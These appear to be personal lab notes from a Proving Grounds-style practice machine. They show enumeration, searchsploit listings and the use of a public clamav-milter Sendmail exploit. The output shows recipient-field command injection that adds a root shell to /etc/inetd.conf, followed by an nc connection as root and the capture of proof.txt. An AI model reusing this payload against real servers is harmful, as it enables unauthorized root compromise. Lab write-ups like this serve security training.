ClamAV_flow
2026-05-15
Web
browse

01101001 01100110 01111001 01101111 01110101 01100100 01101111 01101110 01110100 01110000 01110111 01101110 01101101 01100101 01110101 01110010 01100001 01101110 00110000 00110000 01100010
Throw this in CyberChef with a From Binary recipe and we get a possible #password.
ifyoudontpwnmeuran00b
Feroxbuster
Ffuf vhost
ffuf
ffuf filter 289 response size
Searchsploit
─$ searchsploit apache 1.3.33
----------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation | linux/local/3384.c
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure | linux/remote/132.c
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Execution | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasplo | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Serv | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl
----------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
2026-05-27
SMB
smbclient.md
nullinux.md
[nullinux_users.md](nullinux users)
enum4linux.md
enum4linux-ng.md
Searchsploit
─$ searchsploit samba 3.0.14a
----------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
----------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
2026-06-19
SMTP
SNMP
Try SMTP Again
Searchsploit
┌──(hans㉿KaliKatak)-[~/…/Hax/Practice/PGPractice/ClamAV]
└─$ searchsploit sendmail 8.13.4
Exploits: No Results
Shellcodes: No Results
┌──(hans㉿KaliKatak)-[~/…/Hax/Practice/PGPractice/ClamAV]
└─$ searchsploit sendmail
----------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------- ---------------------------------
Berkeley Sendmail 5.58 - Debug | linux/remote/19028.txt
BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon | multiple/local/19556.sh
Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail | linux/local/19474.txt
ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit) | multiple/remote/9913.rb
Eric Allman Sendmail 8.8.x - Socket Hijack | linux/local/19602.c
Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service | linux/dos/19701.sh
Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/29481.txt
Linux Kernel 2.0 Sendmail - Denial of Service | linux/dos/19282.c
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail 8.10.1 Capabilities Privilege | linux/local/20001.sh
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalat | linux/local/20000.c
Metainfo Sendmail 2.0/2.5 / MetaIP 3.1 - Upload / Execute Read Scripts | multiple/remote/19084.txt
Morris Worm - sendmail Debug Mode Shell Escape (Metasploit) | unix/remote/45789.rb
ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_INFO' Cross-Site Scripting | php/webapps/29957.txt
PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation | php/local/27334.txt
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | multiple/webapps/41688.rb
Sendmail 8.11.6 - Address Prescan Memory Corruption | unix/local/22442.c
Sendmail 8.11.x (Linux/i386) - Local Privilege Escalation | linux/local/411.c
Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (1) | linux/local/21060.c
Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (2) | linux/local/21061.c
Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (3) | linux/local/21062.txt
Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (4) | linux/local/21063.txt
Sendmail 8.12.6 - Compromised Source Backdoor | unix/remote/21919.sh
Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution | linux/remote/24.c
Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun | linux/remote/23154.c
Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow (PoC) | linux/dos/32995.txt
Sendmail 8.12.x - Header Processing Buffer Overflow (1) | unix/remote/22313.c
Sendmail 8.12.x - Header Processing Buffer Overflow (2) | unix/remote/22314.c
Sendmail 8.12.x - SMRSH Double Pipe Access Validation | unix/local/21884.txt
Sendmail 8.13.5 - Remote Signal Handling (PoC) | linux/dos/2051.py
Sendmail 8.6.9 IDENT - Remote Command Execution | unix/remote/20599.sh
Sendmail 8.9.2 - Headers Prescan Denial of Service | irix/dos/23167.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1) | linux/dos/21476.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2) | linux/dos/21477.c
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution | multiple/remote/4761.pl
WEBgais 1.0 - websendmail Remote Command Execution | cgi/remote/20483.txt
----------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
clamav-milter sounds suspicious:
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution | multiple/remote/4761.pl
Exploit
Retrieve exploit:
searchsploit -m multiple/remote/4761.pl
Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/4761
Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
Codes: CVE-2007-4560
Verified: True
File Type: ASCII text
Copied to: /home/hans/Documents/Hax/Practice/PGPractice/ClamAV/4761.pl
Run it:
perl 4761.pl $IP
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.234.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Fri, 19 Jun 2026 12:09:01 -0400; (No UCE/UBE) logging access from: [192.168.45.183](FAIL)-[192.168.45.183]
250-localhost.localdomain Hello [192.168.45.183], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 65JG91KK004334 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
Seems to be injecting a connection as root into /etc/inetd.conf via port 31337.
Use nc to connect to it:
─$ nc -v $IP 31337
192.168.234.42: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.234.42] 31337 (?) open
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
pwd
/
id
uid=0(root) gid=0(root) groups=0(root)
hostname
0xbabe.local
#flag
cd root
ls
dbootstrap_settings
install-report.template
proof.txt
cat proof.txt
78401bd07954cd0aa00dc52e47ea69d2